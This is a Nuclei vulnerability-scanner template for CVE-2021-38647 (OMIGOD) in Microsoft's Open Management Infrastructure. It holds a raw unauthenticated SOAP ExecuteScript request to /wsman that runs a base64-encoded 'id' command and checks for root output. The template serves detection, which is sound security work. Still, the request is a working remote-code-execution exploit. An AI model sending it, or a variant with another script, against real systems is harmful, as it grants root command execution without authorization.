nuclei-templates/cves/2021/CVE-2021-38647.yaml

68 lines
2.9 KiB
YAML

id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo,xstp
severity: critical
tags: cve,cve2021,rce,omi,microsoft
description: Open Management Infrastructure Remote Code Execution Vulnerability
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-38647
requests:
- raw:
- |
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
<s:Header>
<a:To>HTTP://{{Hostname}}/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"/>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteScript_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:Script>aWQ=</p:Script>
<p:Arguments/>
<p:timeout>0</p:timeout>
<p:b64encoded>true</p:b64encoded>
</p:ExecuteScript_INPUT>
</s:Body>
</s:Envelope>
matchers:
- type: word
words:
- '<p:StdOut>'
- 'uid=0(root) gid=0(root) groups=0'
condition: and